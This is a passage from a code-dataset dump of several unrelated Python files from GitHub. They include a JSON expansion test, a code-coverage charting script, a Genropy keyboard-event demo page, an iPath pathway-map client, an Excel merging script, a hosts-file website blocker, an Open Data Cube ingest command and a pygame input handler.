open(f\"{tmpdir}/root.json\") as f:\n            assert jsonref.load(f, base_uri=f\"file://{tmpdir}/\") == original_data\n\n    def test_jsonref(self, tmpdir, test_data, original_data):\n        expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", preserve=False)\n\n        # We can use jsonref to load this new representation.\n        # Note that loading in this way exposes the wrapping element `root`.\n        # `tmpdir` must be a fully qualified path.\n        loaded = jsonref.loads(json.dumps(expanded), base_uri=f\"file://{tmpdir.dirname}/\")\n        assert loaded == {\"root\": original_data}\n        assert loaded[\"root\"] == original_data\n\n        # A raw load of the wrapping document has references to the sub-elements.\n        # This assertion assumes that the original data's elements are all dicts.\n        with open(f\"{tmpdir}/root.json\") as f:\n            assert json.load(f) == {k: {\"$ref\": f\"root/{k}.json\"} for k, v in original_data.items()}\n","repo_name":"jcejohnson/JsonExpandOMatic","sub_path":"tests/test_simple.py","file_name":"test_simple.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22461102996","text":"#!/usr/bin/python3\n\nimport sys\nimport argparse\nimport json\nimport os\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport math\nimport numpy as np\nfrom scipy import stats\n\n# Global vars\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nin_file = script_dir + '/obfuscated_data.json'\nout_file_sys_repo = 
'system_repos.csv'\nout_file_zero_bugs = 'zero_bugs_comp.csv'\nout_file_with_bugs = 'with_bugs_comp.csv'\nout_file_generic = 'generic_comp.csv'\nout_file_component = 'component.csv'\n\n####################################################################################################\n\ndef generate_chart(title, x, x_title, y, y_title, sizes):\n df = {\n x_title: x,\n y_title: y,\n \"Legenda\": \"Repositórios\"\n }\n\n # Calculate Pearson correlation\n pearson_result = stats.pearsonr(x, y)\n correlation = pearson_result[0]\n pvalue = pearson_result[1]\n print(\"Pearson Correlation R=\" + str(correlation))\n print(\"p-value={}%\".format(str(pvalue*100)))\n\n # Generate chart\n fig = px.scatter(df, x_title, y=y_title, size=sizes,\n trendline=\"ols\")\n fig.update_layout(title_text = title, title_font_size=13)\n\n fig.show()\n\n####################################################################################################\n\ndef get_json_data():\n data = None\n\n with open(in_file) as f:\n data = json.load(f)\n\n return data\n\n####################################################################################################\n\ndef is_valid_component(component):\n # To be a valid component it has to contain at least one repository\n return len(component['reposCoverage']) > 0\n\n####################################################################################################\n\ndef system_repos_report(output_type):\n # Initialize body\n csv_body = \"Repository,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for repo in data['System repos']['reposCoverage']:\n covered = data['System repos']['reposCoverage'][repo]['lines-covered']\n total = data['System repos']['reposCoverage'][repo]['lines-valid']\n rate = covered/total\n\n # Fill for CSV\n csv_body += \"{0},{1},{2}\\n\".format(repo, total, covered)\n\n # Fill for chart\n chart_x.append(total)\n chart_y.append(rate * 100)\n chart_size.append(10)\n\n if output_type == 'csv':\n # Write file\n print('Generating CSV file...')\n with open(script_dir + '/' + out_file_sys_repo, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Tamanho em linhas x Cobertura de código',\n chart_x, 'Linhas de código',\n chart_y, 'Cobertura de código (%)',\n chart_size)\n\n####################################################################################################\n\ndef zero_bugs_report(output_type):\n # Initialize body\n csv_body = \"Component,Bugs,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for item in data:\n # Skip not component items\n if not data[item]['isComponent']:\n continue\n\n # Skip invalid components\n if not is_valid_component(data[item]):\n continue\n\n # Skip components with bugs\n if int(data[item]['bugs']) > 0:\n continue\n\n # Sum lines of repositories\n total = 0\n covered = 0\n for repo in data[item]['reposCoverage']:\n total += data[item]['reposCoverage'][repo]['lines-valid']\n covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n # Fill for CSV\n csv_body += \"{0},{1},{2},{3}\\n\".format(item, 0, total, covered)\n\n # Fill for chart\n chart_x.append(total)\n chart_y.append((covered/total) * 100)\n chart_size.append(10)\n\n if output_type == 'csv':\n # Write file\n with open(script_dir + '/' + out_file_zero_bugs, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Tamanho em linhas x Cobertura de código '\n 
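# English: 'Size in lines x code coverage (features with no reported failures)'\n                       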
'(funcionalidades sem falhas reportadas)',\n                       chart_x, 'Linhas de código',\n                       chart_y, 'Cobertura de código (%)',\n                       chart_size)\n\n####################################################################################################\n\ndef with_bugs_report(output_type):\n    # Initialize body\n    csv_body = \"Component,Bugs,Total,Covered\\n\"\n    chart_x = []\n    chart_y = []\n    chart_size = []\n\n    # Get data\n    data = get_json_data()\n\n    # Parse data\n    for item in data:\n        # Skip not component items\n        if not data[item]['isComponent']:\n            continue\n\n        # Skip invalid components\n        if not is_valid_component(data[item]):\n            continue\n\n        # Skip components with no bugs\n        if int(data[item]['bugs']) == 0:\n            continue\n\n        # Sum lines of repositories\n        total = 0\n        covered = 0\n        for repo in data[item]['reposCoverage']:\n            total += data[item]['reposCoverage'][repo]['lines-valid']\n            covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n        # Fill for CSV\n        csv_body += \"{0},{1},{2},{3}\\n\".format(item, data[item]['bugs'], total, covered)\n\n        # Fill for chart\n        chart_x.append((covered/total) * 100)\n        chart_y.append(data[item]['bugs'])\n        chart_size.append(math.sqrt(total))\n\n    if output_type == 'csv':\n        # Write file\n        with open(script_dir + '/' + out_file_with_bugs, 'w') as f:\n            f.write(csv_body)\n    else:\n        # Generate chart\n        generate_chart('Cobertura de código x Falhas reportadas '\n                       '(excluindo funcionalidades sem falhas reportadas)',\n                       chart_x, 'Cobertura de código (%)',\n                       chart_y, 'Falhas reportadas',\n                       chart_size)\n\n####################################################################################################\n\ndef generic_report(output_type):\n    # Initialize body\n    csv_body = \"Component,Bugs,Total,Covered\\n\"\n    chart_x = []\n    chart_y = []\n    chart_size = []\n\n    # Get data\n    data = get_json_data()\n\n    # Parse data\n    for item in data:\n        # Skip not component items\n        if not data[item]['isComponent']:\n            continue\n\n        # Skip invalid components\n        if not is_valid_component(data[item]):\n            continue\n\n        # Sum lines of repositories\n        total = 0\n        covered = 0\n        for repo in data[item]['reposCoverage']:\n            total += data[item]['reposCoverage'][repo]['lines-valid']\n            covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n        # Fill for CSV\n        csv_body += \"{0},{1},{2},{3}\\n\".format(item, data[item]['bugs'], total, covered)\n\n        # Fill for chart\n        chart_x.append((covered/total) * 100)\n        chart_y.append(data[item]['bugs'])\n        chart_size.append(math.sqrt(total))\n\n    if output_type == 'csv':\n        # Write file\n        with open(script_dir + '/' + out_file_generic, 'w') as f:\n            f.write(csv_body)\n    else:\n        # Generate chart\n        generate_chart('Cobertura de código x Falhas reportadas',\n                       chart_x, 'Cobertura de código (%)',\n                       chart_y, 'Falhas reportadas',\n                       chart_size)\n\n####################################################################################################\n\ndef component_report():\n    # Initialize body\n    csv_body = \"Component,Bugs,Repos,Lines\\n\"\n    chart_x = []\n    chart_y = []\n    chart_size = []\n\n    # Get data\n    data = get_json_data()\n\n    # Parse data\n    for item in data:\n        # Skip not component items\n        if not data[item]['isComponent']:\n            continue\n\n        # Get number of repositories\n        n_repos = len(data[item]['reposCoverage'])\n\n        # Sum lines of repos\n        lines = 0\n        for repo in data[item]['reposCoverage']:\n            lines += data[item]['reposCoverage'][repo]['lines-valid']\n\n        # Fill for CSV\n        csv_body += \"{0},{1},{2},{3}\\n\".format(item, 
data[item]['bugs'], n_repos, lines)\n\n    # Write file\n    with open(script_dir + '/' + out_file_component, 'w') as f:\n        f.write(csv_body)\n\n####################################################################################################\n\n###################\n# Argument parser #\n###################\nparser = argparse.ArgumentParser(\n    description='Digest ' + in_file + ' and create a CSV file or a chart.')\nparser.add_argument('-o', '--output', default='csv', choices=['csv', 'chart'],\n                    help='Output type. Default is \\'csv\\'.')\n\ngroup_input = parser.add_mutually_exclusive_group(required=True)\n\ngroup_input.add_argument('-s', '--system-repos-report', action='store_true',\n                         help='Generate a report of system repositories. '\n                         'Output file is ' + out_file_sys_repo)\n\ngroup_input.add_argument('-z', '--zero-bugs-report', action='store_true',\n                         help='Generate a report of valid components without bugs. '\n                         'Output file is ' + out_file_zero_bugs)\n\ngroup_input.add_argument('-b', '--with-bugs-report', action='store_true',\n                         help='Generate a report of valid components with bugs. '\n                         'Output file is ' + out_file_with_bugs)\n\ngroup_input.add_argument('-g', '--generic-report', action='store_true',\n                         help='Generate a report containing all valid components. '\n                         'Output file is ' + out_file_generic)\n\ngroup_input.add_argument('-c', '--component', action='store_true',\n                         help='Generate a component report containing all components. '\n                         'Output file is ' + out_file_component)\n\nargs = parser.parse_args()\n\n###########\n# Execute #\n###########\n\nif args.system_repos_report:\n    system_repos_report(args.output)\n\nelif args.zero_bugs_report:\n    zero_bugs_report(args.output)\n\nelif args.with_bugs_report:\n    with_bugs_report(args.output)\n\nelif args.component:\n    # It does not generate chart\n    if args.output == \"chart\":\n        print('ERROR: component report does not generate chart')\n        sys.exit(1)\n    component_report()\n\nelse:\n    generic_report(args.output)\n\nprint('Done!')\n","repo_name":"redivo/article-coverage-and-defects","sub_path":"data/digest_data.py","file_name":"digest_data.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24835722105","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom builtins import object\r\nclass GnrCustomWebPage(object):\r\n    def main(self,root,**kwargs):\r\n        root.css('.event_type_keydown',\"color:red;\")\r\n        root.css('.event_type_keypress',\"color:green;\")\r\n        bc = root.borderContainer(datapath='logger')\r\n        fb = bc.contentPane(region='top',border_bottom='1px solid silver').formbuilder(cols=4)\r\n        fb.input(value='^.curval',lbl='Test input',\r\n                connect_onkeydown='genro.publish(\"log_event\",{evt:$1});',\r\n                connect_onkeypress='genro.publish(\"log_event\",{evt:$1});')\r\n        fb.checkbox(value='^.keydown',label='onkeydown',default=True)\r\n        fb.checkbox(value='^.keypress',label='onkeypress',default=True)\r\n\r\n        fb.button('Clear',action='SET .logdata = null;SET .curval=null;')\r\n        bc.dataController(\"\"\"\n        if(!data){\n            data = new gnr.GnrBag();\n        }else{\n            data = data.deepCopy();\n        }\n        if(keydown && evt.type=='keydown' || keypress && evt.type=='keypress'){\n            var row = new gnr.GnrBag();\n            columns.forEach(function(c){row.setItem(c,evt[c]) });\n            data.setItem('#id',row,{_customClasses:'event_type_'+evt.type},{_position:'<'});\n            if(data.len()>10){data.popNode('#11');}\n            SET .logdata = data;\n        }\n        evt.target.value = null;\n        \"\"\",data='=.logdata',subscribe_log_event=True,\n            keydown='=.keydown',\n            
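# keydown/keypress mirror the two checkboxes above and gate which event types get logged\n            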
keypress='=.keypress',\n                                columns=['type','charCode','keyIdentifier','keyChar','shiftKey','altKey','ctrlKey','metaKey']\n                            )\n        center = bc.contentPane(region='center',margin='2px')\n        center.quickGrid(value='^.logdata')\n\n","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/test15/webpages/events/keyboard_logger.py","file_name":"keyboard_logger.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"13488737303","text":"import requests\nimport matplotlib as mpl\nimport pandas as pd\nimport numpy as np\nimport warnings\n\n\nvalues=[-10,-5,0,20]\n\ndef map_values_to_colors(values,\n                         non_negative_colormap='inferno',\n                         divergent_color_map='RdBu_r'):\n    \"\"\" if values are non negative a sequential colormap is used, if the values are negative and positive, a symmetrical Red to blue colormap is used\"\"\"\n\n    if all(np.array(values)>=0):\n        norm = None\n        cmap= non_negative_colormap\n    else:\n        extreme= np.abs(values).max()\n        norm = mpl.colors.Normalize(vmin=-extreme,vmax=extreme)\n        cmap=divergent_color_map\n\n    color_scaler=mpl.cm.ScalarMappable(cmap= cmap,norm=norm)\n    rgb=color_scaler.to_rgba(values)[:,:3]\n    color_codes= ['RGB({:.0f},{:.0f},{:.0f})'.format(*tuple(row)) for row in rgb*255]\n\n    return color_codes\n\n\ndef map_values_to_range(Values,output_range=[0,1],vmin=None,vmax=None):\n\n    values= np.array(Values)\n\n\n    if vmin is None: vmin= values.min()\n    if vmax is None: vmax= values.max()\n\n\n    if vmin<0:\n        warnings.warn('minimum of values is negative, data will be mapped from [{},{}] -> [{},{}]'.format(vmin,vmax,*tuple(output_range)))\n\n    diff= vmax-vmin\n\n\n\n    # clip values\n    values[np.where(values>vmax)[0]]=vmax\n    values[np.where(values<vmin)[0]]=vmin\n\n    normed_values= (values-vmin)/diff\n    out_diff= output_range[1]-output_range[0]\n    assert out_diff>0\n\n    return normed_values*out_diff+output_range[0]\n\n\n\n\n\ndef create_selection(data,color_column=None,width_column=None,opacity_column=None,color_kws=None,width_kws=None,opacity_kws=None):\n    \"\"\"transforms a pandas dataframe to selection which can be used in ipath2:\n\n\n    # Supported data types for indexes\n    The following data types are supported by iPath, and can be used to customize the maps. 
Make sure you use the required prefix for each data type, as shown in the examples below.\n\n    Data type\tPrefix\tExample ID\n    KEGG Pathways\t-\t00650\n    KEGG Compounds\t-\tC00003\n    KEGG KOs\t-\tK01000\n    STRING proteins\t-\t224324.AQ_626\n    KEGG proteins\t-\taae:aq_626\n    COGs/eggNOGG OGs\t-\tCOG0007\n    Enzyme EC numbers\tE or EC\tE2.4.1.82\n    Uniprot IDs/ACCs\tUNIPROT:\tUNIPROT:Q93015\n    IPI IDs\t-\tIPI00745889\n    NCBI GI IDs\tncbi-gi:\tncbi-gi:326314893\n\n\n    \"\"\"\n\n\n\n    assert type(data)== pd.DataFrame\n\n    output_data= pd.DataFrame(index= data.index)\n\n    if not color_column is None:\n        if color_kws is None: color_kws={}\n        output_data['color']= map_values_to_colors( data[color_column], **color_kws)\n\n    if not width_column is None:\n\n        width_default_param=dict(output_range=[0,50])\n        if not width_kws is None: width_default_param.update(width_kws)\n\n        output_data['Width']= map_values_to_range(data[width_column],**width_default_param).astype(str)\n        output_data['Width']=\"W\"+output_data['Width']\n    if not opacity_column is None:\n        if opacity_kws is None: opacity_kws={}\n        output_data['Opacity']= map_values_to_range(data[opacity_column],**opacity_kws).astype(str)\n\n    output_str=''\n    for i,row in output_data.iterrows():\n        output_str+=' '.join([str(i)]+list(row))+'\\n'\n\n    return output_str\n\n## Communication\n\n\ndef to_parameters(selection ,\n                  export_type='svg',\n                  include_metabolic=True,\n                  include_secondary=False,\n                  include_antibiotic=False,\n                  include_microbial=False,\n                  whole_modules=False,\n                  whole_pathways=False,\n                  keep_colors=False,\n                  default_opacity=1,\n                  default_width=3,\n                  default_radius=7,\n                  default_color='#666666',\n                  query_reactions=False,\n                  tax_filter='',\n                  export_dpi=1200):\n\n    allowed_export_types= ['svg','png','pdf','eps']\n    assert export_type in allowed_export_types , \"export_type {} needs to be one of {}\".format(export_type,allowed_export_types)\n    #assert map_type=='svg', \"I can not save PNG images\"\n\n    return dict( selection=selection,\n                 export_type=export_type,\n                 keep_colors=int(keep_colors),\n                 include_metabolic=int(include_metabolic),\n                 include_secondary= int(include_secondary),\n                 include_antibiotic= int(include_antibiotic),\n                 include_microbial= int(include_microbial),\n                 whole_modules= int(whole_modules),\n                 default_opacity= default_opacity,\n                 whole_pathways=int(whole_pathways),\n                 default_width= default_width,\n                 default_color= default_color,\n                 default_radius= default_radius,\n                 query_reactions= int(query_reactions),\n                 tax_filter= tax_filter,\n                 export_dpi=export_dpi)\n\n    # #\ndef get_map(selection,map_name='map',**param):\n\n    url= 'https://pathways.embl.de/mapping.cgi'\n\n\n\n    #print(selection[:300]+'...')\n    parameters=to_parameters(selection,**param)\n\n    r = requests.post(url, data=parameters)\n    assert r.ok, r.text\n\n\n    with open(map_name+'.svg','w') as file:\n        file.write(r.text)\n\n\nfrom IPython.display import SVG\n\nimport svgutils.compose as sc\n\ndef scale_map(map_name):\n\n    sc.Figure(\"26cm\", \"16cm\",\n        sc.Panel(sc.SVG(map_name+\".svg\").scale(0.265)),\n        ).save(map_name+'_scaled.svg')\n\n\ndef inspect_online(selection,**param):\n\n    url= 'https://pathways.embl.de/ipath.cgi'\n\n\n    parameters=to_parameters(selection,**param)\n\n    r = requests.post(url, data=parameters)\n    return r\n","repo_name":"SilasK/ipath3","sub_path":"ipath.py","file_name":"ipath.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"25152130672","text":"import pandas as pd\r\n\r\nsrcDirectory = '../4.1 일단위로 작업량 
계산된 엑셀 파일/'\r\n\r\n\r\ndstDirectory = '../5.1 병합된 엑셀 파일/'\r\ndstFilename = '가공-도장-조립 취합_전체.xlsx'\r\n\r\nsrc1Filename = '1_가공실적_전체_2016.xlsx'\r\nsrc2AFilename = '2A_선행도장_전체_2016.xlsx'\r\nsrc2BFilename = '2B_선행도장_전체_2016.xlsx'\r\nsrc3Filename = '3_조립실적_전체_2016.xlsx'\r\n\r\nsrc1df = pd.read_excel(srcDirectory + src1Filename)\r\nprint(src1df.head())\r\n#print(src1df.columns)\r\n\r\n# There is a column named 'Unnamed: 0'; drop it\r\nsrc1df = src1df.drop(src1df.columns[0], axis=1)\r\nprint(src1df.head())\r\n\r\nsrc2Adf = pd.read_excel(srcDirectory + src2AFilename)\r\nprint(src2Adf.head())\r\n\r\n# Drop the 'Unnamed: 0' column and the date column\r\nsrc2Adf = src2Adf.drop(src2Adf.columns[[0,1]], axis=1)\r\nprint(src2Adf.head())\r\n\r\nsrc2Bdf = pd.read_excel(srcDirectory + src2BFilename)\r\nprint(src2Bdf.head())\r\n\r\n# Drop the 'Unnamed: 0' column and the date column\r\nsrc2Bdf = src2Bdf.drop(src2Bdf.columns[[0,1]], axis=1)\r\nprint(src2Bdf.head())\r\n\r\nsrc3df = pd.read_excel(srcDirectory + src3Filename)\r\nprint(src3df.head())\r\n\r\n# Drop the 'Unnamed: 0' column and the date column\r\nsrc3df = src3df.drop(src3df.columns[[0,1]], axis=1)\r\nprint(src3df.head())\r\n\r\n\r\nfor year in range(2017, 2024):\r\n    src1Filename = '1_가공실적_전체_' + str(year) + '.xlsx'\r\n    src2AFilename = '2A_선행도장_전체_' + str(year) + '.xlsx'\r\n    src2BFilename = '2B_선행도장_전체_' + str(year) + '.xlsx'\r\n    src3Filename = '3_조립실적_전체_' + str(year) + '.xlsx'\r\n\r\n    temp_src1df = pd.read_excel(srcDirectory + src1Filename)\r\n    temp_src1df = temp_src1df.drop(temp_src1df.columns[0], axis=1)\r\n    src1df['1.가공>중량'] = src1df['1.가공>중량'] + temp_src1df['1.가공>중량']\r\n    src1df['1.가공>절단장'] = src1df['1.가공>절단장'] + temp_src1df['1.가공>절단장']\r\n\r\n    temp_src2Adf = pd.read_excel(srcDirectory + src2AFilename)\r\n    temp_src2Adf = temp_src2Adf.drop(temp_src2Adf.columns[0], axis=1)\r\n    src2Adf['2A.선행도장>표면처리'] = src2Adf['2A.선행도장>표면처리'] + temp_src2Adf['2A.선행도장>표면처리']\r\n\r\n    temp_src2Bdf = pd.read_excel(srcDirectory + src2BFilename)\r\n    temp_src2Bdf = temp_src2Bdf.drop(temp_src2Bdf.columns[0], axis=1)\r\n    src2Bdf['2B.선행도장>도장'] = src2Bdf['2B.선행도장>도장'] + temp_src2Bdf['2B.선행도장>도장']\r\n    \r\n    temp_src3df = pd.read_excel(srcDirectory + src3Filename)\r\n    temp_src3df = temp_src3df.drop(temp_src3df.columns[0], axis=1)\r\n    src3df['3.조립>중량'] = src3df['3.조립>중량'] + temp_src3df['3.조립>중량']\r\n    src3df['3.조립>용접장'] = src3df['3.조립>용접장'] + temp_src3df['3.조립>용접장']\r\n    src3df['3.조립>용착량'] = src3df['3.조립>용착량'] + temp_src3df['3.조립>용착량']\r\n\r\n\r\ndfCombined = pd.concat([src1df,src2Adf,src2Bdf,src3df], axis=1)\r\nprint(dfCombined.head())\r\n\r\nif True:\r\n    print(\"save to : \", dstDirectory + dstFilename)\r\n    dfCombined.to_excel(dstDirectory + dstFilename)","repo_name":"eyedicamp/ElectricityUseRegression","sub_path":"Raw 데이터 처리 로직 개발 (가공, 도장, 조립)/5.2 병합용 파이썬 코드/Combine dataframes.py","file_name":"Combine dataframes.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11602856124","text":"import time \r\nfrom datetime import datetime as dt\r\n\r\npath=r\"C:/windows/system32/drivers/etc/hosts\"\r\n\r\ndirect=\"127.0.0.1\"\r\nl=[]\r\nn=int(input(\"Enter the number of websites to be blocked\"))\r\nprint(\"Enter the url of the website\")\r\nfor i in range(n):\r\n    x=input()\r\n    l.append(x) \r\n    \r\n\r\n\r\nif dt(dt.now().year,dt.now().month,dt.now().day,8) (DatasetType, DatasetType)\n    \"\"\"\n    Create the output product for the given ingest config if it doesn't already exist.\n\n    It will throw a ValueError if the config already exists but differs from the existing.\n    Set allow_product_changes=True to allow changes.\n    \"\"\"\n\n    index = driver_manager.index\n    source_type = 
index.products.get_by_name(config['source_type'])\n if not source_type:\n click.echo(\"Source DatasetType %s does not exist\" % config['source_type'])\n click.get_current_context().exit(1)\n\n output_type = morph_dataset_type(source_type, config, driver_manager)\n _LOG.info('Created DatasetType %s', output_type.name)\n\n existing = index.products.get_by_name(output_type.name)\n if existing:\n can_update, safe_changes, unsafe_changes = index.products.can_update(output_type)\n if safe_changes or unsafe_changes:\n if not allow_product_changes:\n raise ValueError(\"Ingest config differs from the existing output product, \"\n \"but allow_product_changes=False\")\n output_type = index.products.update(output_type)\n else:\n output_type = index.products.add(output_type)\n\n return source_type, output_type\n\n\n@cachetools.cached(cache={}, key=lambda index, id_: id_)\ndef get_full_lineage(index, id_):\n return index.datasets.get(id_, include_sources=True)\n\n\ndef load_config_from_file(index, config):\n config_name = Path(config).name\n _, config = next(read_documents(Path(config)))\n config['filename'] = config_name\n\n return config\n\n\ndef create_task_list(driver_manager, output_type, year, source_type, config):\n config['taskfile_version'] = int(time.time())\n\n query = {}\n if year:\n query['time'] = Range(datetime(year=year[0], month=1, day=1), datetime(year=year[1] + 1, month=1, day=1))\n if 'ingestion_bounds' in config:\n bounds = config['ingestion_bounds']\n query['x'] = Range(bounds['left'], bounds['right'])\n query['y'] = Range(bounds['bottom'], bounds['top'])\n\n time_size = 1\n if 'time' in config['storage']['tile_size']:\n time_size = config['storage']['tile_size']['time']\n\n tasks = find_diff(source_type, output_type, driver_manager, time_size, **query)\n _LOG.info('%s tasks discovered', len(tasks))\n\n def check_valid(tile, tile_index):\n if FUSER_KEY in config:\n return True\n\n require_fusing = [source for source in tile.sources.values if len(source) > 1]\n if require_fusing:\n _LOG.warning('Skipping %s - no \"%s\" specified in config: %s', tile_index, FUSER_KEY, require_fusing)\n\n return not require_fusing\n\n def update_sources(sources):\n return tuple(get_full_lineage(driver_manager.index, dataset.id) for dataset in sources)\n\n def update_task(task):\n tile = task['tile']\n for i in range(tile.sources.size):\n tile.sources.values[i] = update_sources(tile.sources.values[i])\n return task\n\n tasks = (update_task(task) for task in tasks if check_valid(**task))\n return tasks\n\n\ndef ingest_work(driver_manager, config, source_type, output_type, tile, tile_index):\n _LOG.info('Starting task %s', tile_index)\n\n namemap = get_namemap(config)\n measurements = get_measurements(source_type, config)\n variable_params = get_variable_params(config)\n global_attributes = config['global_attributes']\n\n with datacube.set_options(reproject_threads=1):\n fuse_func = {'copy': None}[config.get(FUSER_KEY, 'copy')]\n data = Datacube.load_data(tile.sources, tile.geobox, measurements,\n fuse_func=fuse_func, driver_manager=driver_manager)\n nudata = data.rename(namemap)\n file_path = get_filename(config, tile_index, tile.sources)\n\n def _make_dataset(labels, sources):\n return make_dataset(product=output_type,\n sources=sources,\n extent=tile.geobox.extent,\n center_time=labels['time'],\n uri=file_path.absolute().as_uri(),\n app_info=get_app_metadata(config, config['filename']),\n valid_data=GeoPolygon.from_sources_extents(sources, tile.geobox))\n\n datasets = xr_apply(tile.sources, 
_make_dataset, dtype='O') # Store in Dataarray to associate Time -> Dataset\n nudata['dataset'] = datasets_to_doc(datasets)\n\n # Until ingest becomes a class and DriverManager an instance\n # variable, we call the constructor each time. DriverManager being\n # a singleton, there is little overhead, though.\n datasets.attrs['storage_output'] = driver_manager.write_dataset_to_storage(nudata,\n file_path,\n global_attributes,\n variable_params)\n _LOG.info('Finished task %s', tile_index)\n\n # When using multiproc executor, Driver Manager is a clone.\n if driver_manager.is_clone:\n driver_manager.close()\n\n return datasets\n\n\ndef _index_datasets(driver_manager, results):\n n = 0\n for datasets in results:\n n += driver_manager.index_datasets(datasets, sources_policy='verify')\n return n\n\n\ndef process_tasks(driver_manager, config, source_type, output_type, tasks, queue_size, executor):\n def submit_task(task):\n _LOG.info('Submitting task: %s', task['tile_index'])\n return executor.submit(ingest_work,\n driver_manager=driver_manager,\n config=config,\n source_type=source_type,\n output_type=output_type,\n **task)\n\n pending = []\n n_successful = n_failed = 0\n\n tasks = iter(tasks)\n while True:\n pending += [submit_task(task) for task in itertools.islice(tasks, max(0, queue_size - len(pending)))]\n if not pending:\n break\n\n completed, failed, pending = executor.get_ready(pending)\n _LOG.info('completed %s, failed %s, pending %s', len(completed), len(failed), len(pending))\n\n for future in failed:\n try:\n executor.result(future)\n except Exception: # pylint: disable=broad-except\n _LOG.exception('Task failed')\n n_failed += 1\n\n if not completed:\n time.sleep(1)\n continue\n\n try:\n # TODO: ideally we wouldn't block here indefinitely\n # maybe limit gather to 50-100 results and put the rest into a index backlog\n # this will also keep the queue full\n n_successful += _index_datasets(driver_manager, executor.results(completed))\n except Exception: # pylint: disable=broad-except\n _LOG.exception('Gather failed')\n pending += completed\n\n return n_successful, n_failed\n\n\ndef _validate_year(ctx, param, value):\n try:\n if value is None:\n return None\n years = list(map(int, value.split('-', 2)))\n if len(years) == 1:\n return years[0], years[0]\n return tuple(years)\n except ValueError:\n raise click.BadParameter('year must be specified as a single year (eg 1996) '\n 'or as an inclusive range (eg 1996-2001)')\n\n\n@cli.command('ingest', help=\"Ingest datasets\")\n@click.option('--config-file', '-c',\n type=click.Path(exists=True, readable=True, writable=False, dir_okay=False),\n help='Ingest configuration file')\n@click.option('--year', callback=_validate_year, help='Limit the process to a particular year')\n@click.option('--queue-size', type=click.IntRange(1, 100000), default=3200, help='Task queue size')\n@click.option('--save-tasks', help='Save tasks to the specified file',\n type=click.Path(exists=False))\n@click.option('--load-tasks', help='Load tasks from the specified file',\n type=click.Path(exists=True, readable=True, writable=False, dir_okay=False))\n@click.option('--dry-run', '-d', is_flag=True, default=False, help='Check if everything is ok')\n@click.option('--allow-product-changes', is_flag=True, default=False,\n help='Allow the output product definition to be updated if it differs.')\n@ui.executor_cli_options\n@ui.pass_driver_manager(app_name='agdc-ingest')\ndef ingest_cmd(driver_manager,\n config_file,\n year,\n queue_size,\n save_tasks,\n load_tasks,\n dry_run,\n 
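# executor is supplied by the @ui.executor_cli_options decorator above\n               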
executor,\n               allow_product_changes):\n    index = driver_manager.index\n    if config_file:\n        config = load_config_from_file(index, config_file)\n        source_type, output_type = ensure_output_type(driver_manager, config,\n                                                      allow_product_changes=allow_product_changes)\n\n        tasks = create_task_list(driver_manager, output_type, year, source_type, config)\n    elif load_tasks:\n        config, tasks = load_tasks_(load_tasks)\n        source_type, output_type = ensure_output_type(driver_manager, config,\n                                                      allow_product_changes=allow_product_changes)\n    else:\n        click.echo('Must specify exactly one of --config-file, --load-tasks')\n        return 1\n\n    if dry_run:\n        check_existing_files(get_filename(config, task['tile_index'], task['tile'].sources) for task in tasks)\n        return 0\n\n    if save_tasks:\n        save_tasks_(config, tasks, save_tasks)\n        return 0\n\n    successful, failed = process_tasks(driver_manager, config, source_type, output_type, tasks, queue_size, executor)\n    click.echo('%d successful, %d failed' % (successful, failed))\n\n    return 0\n","repo_name":"benjimin/pully","sub_path":"datacube/scripts/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":16016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37515873795","text":"from globvar import *\r\nfrom utilities import map_load\r\nfrom game_objects import player_object\r\nbullets=[]\r\nplayer = player_object((350,350),bullets.append)\r\nmap_info = map_load(\"BoogieWonderland\")\r\n\r\ndef key_interact(position):\r\n    global aHeld, wHeld, sHeld, dHeld, player\r\n\r\n    key_pressed = pygame.key.get_pressed()\r\n    if key_pressed[pygame.K_RIGHT]:\r\n        player.speen(1)\r\n    elif key_pressed[pygame.K_LEFT]:\r\n        player.speen(3)\r\n    elif key_pressed[pygame.K_UP]:\r\n        player.speen(2)\r\n    elif key_pressed[pygame.K_DOWN]:\r\n        player.speen(0)\r\n    \r\n    if key_pressed[pygame.K_a]:\r\n        if not aHeld:\r\n            player.altMove(1)\r\n            aHeld = True\r\n    else:\r\n        aHeld = False\r\n\r\n    if key_pressed[pygame.K_w]:\r\n        if not wHeld:\r\n            player.altMove(2)\r\n            wHeld = True\r\n    else:\r\n        wHeld = False\r\n\r\n    if key_pressed[pygame.K_d]:\r\n        if not dHeld:\r\n            player.altMove(3)\r\n            dHeld = True\r\n    else:\r\n        dHeld = False\r\n\r\n    if key_pressed[pygame.K_s]:\r\n        if not sHeld:\r\n            player.altMove(4)\r\n            sHeld = True\r\n    else:\r\n        sHeld = False\r\ndef shootCheck():\r\n    global spaceHeld\r\n    key_pressed = pygame.key.get_pressed()\r\n    if key_pressed[pygame.K_SPACE]:\r\n        if not spaceHeld:\r\n            player.shoot()\r\n            